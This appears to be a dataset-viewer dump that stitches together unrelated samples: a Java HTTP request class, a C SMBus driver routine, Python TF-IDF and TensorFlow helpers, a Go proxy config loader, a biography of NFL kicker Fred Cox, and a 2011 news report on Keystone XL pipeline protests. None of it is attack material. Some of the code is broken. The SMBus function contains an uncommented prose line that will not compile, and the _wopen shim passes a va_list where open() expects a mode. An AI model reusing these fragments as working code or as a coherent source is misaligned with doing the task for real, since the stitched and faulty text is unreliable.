try {
countentLength = requestBody.getBytes(charsetString).length;
} catch (UnsupportedEncodingException e) {
countentLength = requestBody.getBytes().length;
logger.debug(e);
}
}else{
countentLength = requestBody.getBytes().length;
}
Pattern p = Pattern.compile("Content-Length: [0-9]*");
Matcher m = p.matcher(requestMessage);
String newMessage = m.replaceFirst("Content-Length: " + Integer.toString(countentLength));
super.rawMessage = newMessage.getBytes();
}
public String getCharset(){
String [] hedders = this.getHeadders();
String targetString = "";
for(int i=0;i<hedders.length;i++){
targetString = hedders[i];
if(StringUtils.containsIgnoreCase(targetString,"Content-Type: ")==true){
break;
}
}
String retString = null;
Pattern p = Pattern.compile("charset=.*");
Matcher m = p.matcher(targetString);
if(m.find()){
String matchstr = m.group();
if(StringUtils.containsIgnoreCase(matchstr,"SHIFT_JIS")){
retString = "Shift_JIS";
}else if(StringUtils.containsIgnoreCase(matchstr,"UTF-8")){
retString = "UTF-8";
}else if(StringUtils.containsIgnoreCase(matchstr,"EUC-JP")){
retString = "EUC-JP";
}else{
//
}
}
return retString;
}
public String[] getHeadders(){
String requestAllHeader = StringUtils.substringBefore(new String(super.rawMessage),"\r\n\r\n");
String requestHeader = StringUtils.substringAfter(requestAllHeader,"\r\n");
String [] headders = requestHeader.split("\r\n");
return headders;
}
public String []getRedirectHeadders(){
String [] headders = this.getHeadders();
ArrayList<String> retArray = new ArrayList<>();
for(int i=0;i<headders.length;i++){
if(headders[i].startsWith("Content-Length")){
}else{
retArray.add(headders[i]);
}
}
String [] ret = new String[retArray.size()];
retArray.toArray(ret);
return ret;
}
@Override
public String toString() {
return new String(super.rawMessage);
}
//setter.getter
public String getHttpRequestString(){
return new String(super.rawMessage);
}
public String getHttpRequestMethod(){
return httprequestline.getMethod();
}
public String getHttpRequestPath(){
return httprequestline.getPath();
}
public String getHttpRequestVersion(){
return httprequestline.getVersion();
}
}
|
//*****************************************************************************
//
//! Returns the current value of the AV (Address Valid) flag.
//!
//! \param psSMBus specifies the SMBus configuration structure.
//!
//! This returns the value of the AV (Address Valid) flag.
//!
//! \return Returns \b true if set, or \b false if cleared.
//
//*****************************************************************************
bool
SMBusSlaveARPFlagAVGet(tSMBus *psSMBus)
{
Get the value of the block address valid flag.
return(HWREGBITB(&psSMBus->ui16Flags, FLAG_ADDRESS_VALID));
} |
def tfidfQuery(self,queryTerms,idf):
tf_idfQuery = []
tfQuery = Counter(queryTerms)
if len(queryTerms) == 0:
return 0
for word in queryTerms:
tfQuery[word] = 1+math.log(tfQuery[word])
tf_idfQuery.append(float(tfQuery[word])*idf[word])
normTfIdf = math.sqrt(sum(map(lambda x: x**2, tf_idfQuery)))
try:
return map(lambda x:x/normTfIdf, tf_idfQuery)
except ZeroDivisionError:
return [0] |
// Load loads a TOML file from path.
func (c *Config) Load(path string) error {
md, err := toml.DecodeFile(path, c)
if err != nil {
return err
}
if len(md.Undecoded()) > 0 {
return errors.New("Unknown config keys in " + path)
}
if len(c.Incoming.AllowFrom) > 0 {
subnets := make([]*net.IPNet, 0, len(c.Incoming.AllowFrom))
for _, s := range c.Incoming.AllowFrom {
if strings.IndexByte(s, '/') == -1 {
s = s + "/32"
}
_, n, err := net.ParseCIDR(s)
if err != nil {
return errors.New("Invalid network or IP address: " + s)
}
subnets = append(subnets, n)
}
c.Incoming.allowSubnets = subnets
}
c.Outgoing.AllowSites = toLowerStrings(c.Outgoing.AllowSites)
c.Outgoing.DenySites = toLowerStrings(c.Outgoing.DenySites)
return nil
} |
For other people with the same name, see Fred Cox (disambiguation)
Frederick William Cox is a former National Football League kicker who played for the Minnesota Vikings throughout his career (1963–1977).
Early life [ edit ]
Cox was raised in Monongahela, Pennsylvania, outside Pittsburgh. His parents owned and operated a small grocery store, which is still in operation by his brothers family after four (4) generations.
College [ edit ]
Cox played college football at Pittsburgh and was drafted by the Cleveland Browns in the 8th round of the 1961 NFL Draft and the New York Titans in the 28th round of the AFL Draft that same year. He never ended up playing for either team.
Professional career [ edit ]
Known to contemporary Vikings fans as "Freddie the Foot",[citation needed] he is the Vikings' all-time leader in scoring (1,365 points) and field goals (282). He is also one of 11 Vikings to play in all four of their Super Bowl appearances in the 1970s. He led the NFL in scoring in 1969 with 121 points and again in 1970 with 125 and was named first team All-Pro both years. He was also named NFC first team All-Pro in 1971 with 91 points scored. In 1970, he was the NFC kicker in the Pro Bowl game. Cox was also the Vikings' punter in his rookie season with a 38.7 yards per kick average on 70 attempts.[1]
At the time of his retirement, Cox was the NFL's second all-time leading scorer (with 1,365 points) behind George Blanda.
Personal [ edit ]
Cox was first married to Elayne Darrall Cox. Their four children are Darryl Cox, Susan Cox Biasco, Fred A. Cox, and Kim Ok-soon. He is currently married to Bonnie Hope Cox.
Cox is the inventor of the Nerf football. He came up with the idea while still playing for the Vikings.[2] Fred Cox became a licensed chiropractor after his NFL career.[citation needed] Dr. Cox had his practice in Buffalo, Minnnesota.[citation needed]
References [ edit ] |
More than 200 people were arrested outside the White House Saturday following two weeks of protests directed at President Obama in an effort to persuade him to deny final permitting of a controversial 1,661-mile pipeline that would carry oil from Alberta, Canada, to Port Arthur, Tex.
The arrests follow more than 1,000 arrests made since protesters arrived in late August to conduct sit-ins along Pennsylvania Avenue.
While a White House decision is not expected until December, the protests centered on an environmental impact statement released Aug. 26 by the US State Department that concluded there will be “no significant impact” on natural resources affected by the pipeline route.
The Monitor's weekly news quiz for Aug. 29-Sept. 2, 2011
If Obama approves the pipeline, it will begin a series of additional permits, approvals and authorizations, with operation set to launch in 2013. The $7 billion, 36-inch pipeline, called the Keystone XL, is expected to deliver 830,000 barrels, or 34.9 million gallons, per day across Montana, South Dakota, Nebraska, Kansas, and Oklahoma into Texas.
TransCanada, a leading North American pipeline operator, started operation of Keystone I, a 36-inch pipeline system, in June 2010, making it possible to deliver Canadian oil to markets across Midwest farmland in several states, from the Dakotas through Illinois. Keystone XL will incorporate a section of that existing pipeline in its delivery through the bottom half of the US.
Environmentalists say TransCanada has a failed safety record regarding its pipeline operations.
Federal regulators shut down Keystone I following two leaks, on May 7 and May 29. The first released 400 barrels, or 16,800 gallons, of crude oil in Sargent County, North Dakota. The second involved a leak at a pump station in Doniphan County, Kan., which released 10 barrels, or 420 gallons, of crude oil into the environment. The pipeline was restarted days later.
In a statement, Russ Girling, TransCanada's president and chief executive officer said “TransCanada takes all incidents very seriously … none of the incidents involved the pipe in the ground. The integrity of Keystone is sound.”
In its environmental impact statement, the US State Department said the existing pipeline experienced 14 spills since June 2010. Seven were 10 gallons or less, two were between 300 and 500 gallons, and one was 21,000 gallons.
The State Department estimates that the maximum the Keystone XL could potentially spill would be 2.8 million gallons along an area of 1.7 miles.
The Canadian government said Thursday it expects Obama to approve the pipeline.
Environment Minister Peter Kent told Reuters that his government “can look forward to eventual approval by the American government” and that TransCanada had “perhaps one of the best records of any pipeline operator” in North America.
Proponents of the pipeline say it will help the troubled US economy. TransCanada says the US will receive $20 billion through new job creation and local property taxes. The State Department report estimates that the pipeline will create between 5,000 and 6,000 new jobs that will generate up to $419 million in total wages. Nearly $7 billion will be added through additional costs, such as supplies and permitting.
Environmentalists and their supporters, including Nebraska Gov. Dave Heineman (R) and former Vice President Al Gore, say the pipeline will be a threat to national security because of its potential dangers and that it presents lasting harm to natural resources.
Bill Erasmus, the Assembly of First Nations regional chief for the Northwest Territories told CBS News Saturday that the pipeline will likely harm the Ogallala Aquifer, which covers 450,000 square kilometers and includes portions of Nebraska, South Dakota, Wyoming, Kansas, Colorado, Oklahoma, New Mexico, and Texas.
“If there is a spill in that aquifer, it will mess up the water for about four million people,” Mr. Erasmus said.
The State Department will conduct a series of public meetings Sept. 26-30 in Texas, Kansas, Montana, Nebraska, Texas, and South Dakota. A final public hearing is scheduled Oct. 7 in Washington. Another round of protests is expected to take place in Ottawa Sept. 26.
The Monitor's weekly news quiz for Aug. 29-Sept. 2, 2011 |
// workaround for zlib with cygwin build
int _wopen (const char *path, int oflag, ...)
{
va_list ap;
va_start (ap, oflag);
int r = open (path, oflag, ap);
va_end (ap);
return r;
} |
def _parse_tensor_info_proto(tensor_info):
encoding = tensor_info.WhichOneof("encoding")
dtype = tf.DType(tensor_info.dtype)
shape = tf.TensorShape(tensor_info.tensor_shape)
if encoding == "name":
return ParsedTensorInfo(dtype=dtype, shape=shape, is_sparse=False)
elif encoding == "coo_sparse":
return ParsedTensorInfo(dtype=dtype, shape=shape, is_sparse=True)
else:
raise ValueError("Unsupported TensorInfo encoding %r" % encoding) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.